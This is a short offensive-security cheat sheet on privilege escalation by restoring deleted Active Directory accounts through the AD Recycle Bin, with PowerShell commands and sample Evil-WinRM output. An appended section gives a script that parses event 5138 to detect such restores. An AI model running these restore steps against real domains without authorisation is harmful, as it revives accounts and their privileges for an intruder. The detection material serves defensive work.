TLDRBins / AD Recycle Bin


Privesc #1: Restore Deleted AD Object

1. Import AD Module

Import-Module activedirectory
Sample Output: *Evil-WinRM* PS C:\Users\test.user\Documents> import-module activedirectory

2. Query All Deleted Objects within Domain

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Sample Output:
    *Evil-WinRM* PS C:\Users\test.user\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

    Deleted           : True
    DistinguishedName : CN=Another User\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=example,DC=com
    Name              : Another User
                        DEL:ebe15df5-e265-45ec-b7fc-359877217138
    ObjectClass       : user
    ObjectGUID        : ebe15df5-e265-45ec-b7fc-359877217138

3. Get All Details for the Deleted Object

Get-ADObject -filter { SAMAccountName -eq '<DELETED_USER>' } -includeDeletedObjects -property *
Sample Output:
    *Evil-WinRM* PS C:\Users\test.user\Documents> Get-ADObject -filter { SAMAccountName -eq 'another.user' } -includeDeletedObjects -property *

    accountExpires  : 9223372036854775807
    badPasswordTime : 0
    badPwdCount     : 0
    CanonicalName   : example.com/Deleted Objects/Another User
                      DEL:ebe15df5-e265-45ec-b7fc-359877217138
    CN              : Another User
                      DEL:ebe15df5-e265-45ec-b7fc-359877217138
    ---[SNIP]---

4. Restore the Deleted Object

# Rename the target account to avoid a "user exists" error
Restore-ADObject -Identity <OBJECT_GUID> -NewName '<DELETED_USER>.2' -TargetPath 'CN=Users,DC=<EXAMPLE>,DC=<COM>'
Sample Output: *Evil-WinRM* PS C:\Users\test.user\Documents> Restore-ADObject -Identity ebe15df5-e265-45ec-b7fc-359877217138 -NewName 'Another User2' -TargetPath 'CN=Users,DC=EXAMPLE,DC=COM'

# Or
Restore-ADObject -Identity "<DISTINGUISHED_NAME>"
Sample Output: PS C:\programdata> Restore-ADObject -Identity "CN=Apple Seed\0ADEL:1c6---[SNIP]---9db,CN=Deleted Objects,DC=example,DC=com"

5. Check

net user <DELETED_USER>
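
Detection side of the restore in step 4, as an added example that is not part of the original page: when "Audit Directory Service Changes" is enabled, a domain controller logs Security event 5138 ("A directory service object was undeleted") for each restore. The function name ConvertFrom-UndeleteEvent and the sample event are constructed for illustration; the sample reuses the placeholder names from the steps above.

```powershell
# Constructed sample 5138 event (not captured from a real system).
$sampleEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>5138</EventID><TimeCreated SystemTime="2024-01-01T10:00:00Z" /></System>
  <EventData>
    <Data Name="SubjectUserName">test.user</Data>
    <Data Name="SubjectDomainName">EXAMPLE</Data>
    <Data Name="OldObjectDN">CN=Another User\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=example,DC=com</Data>
    <Data Name="NewObjectDN">CN=Another User2,CN=Users,DC=example,DC=com</Data>
    <Data Name="ObjectGUID">ebe15df5-e265-45ec-b7fc-359877217138</Data>
    <Data Name="ObjectClass">user</Data>
  </EventData>
</Event>
'@

# Hypothetical helper: turn one 5138 event into a row an analyst can triage.
function ConvertFrom-UndeleteEvent {
    param([Parameter(Mandatory)][xml]$EventXml)
    # Flatten <Data Name="...">value</Data> pairs into a lookup table
    $data = @{}
    foreach ($d in $EventXml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    # Name before deletion: the RDN text ahead of the "\0ADEL:<guid>" suffix
    $oldName = if ($data.OldObjectDN -match '^CN=(.+?)(\\0A|\n)DEL:') { $Matches[1] } else { $null }
    # RDN the object was restored under (differs when -NewName was used, as in step 4)
    $newName = if ($data.NewObjectDN -match '^CN=((?:\\.|[^,])+),') { $Matches[1] } else { $null }
    [pscustomobject]@{
        Time        = $EventXml.Event.System.TimeCreated.SystemTime
        Actor       = '{0}\{1}' -f $data.SubjectDomainName, $data.SubjectUserName
        ObjectClass = $data.ObjectClass
        ObjectGuid  = $data.ObjectGUID
        RestoredTo  = $data.NewObjectDN
        Renamed     = ($null -ne $oldName -and $oldName -ne $newName)
        # With the Recycle Bin enabled, a restored account returns with its
        # attributes and group memberships, so user restores deserve review
        NeedsReview = ($data.ObjectClass -eq 'user')
    }
}

ConvertFrom-UndeleteEvent -EventXml $sampleEvent

# On a domain controller, feed real events instead:
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5138 } |
#     ForEach-Object { ConvertFrom-UndeleteEvent -EventXml $_.ToXml() }
```

A row with Renamed set to True for a user object, raised by an account that does not normally administer the directory, matches the restore-under-a-new-name pattern from step 4.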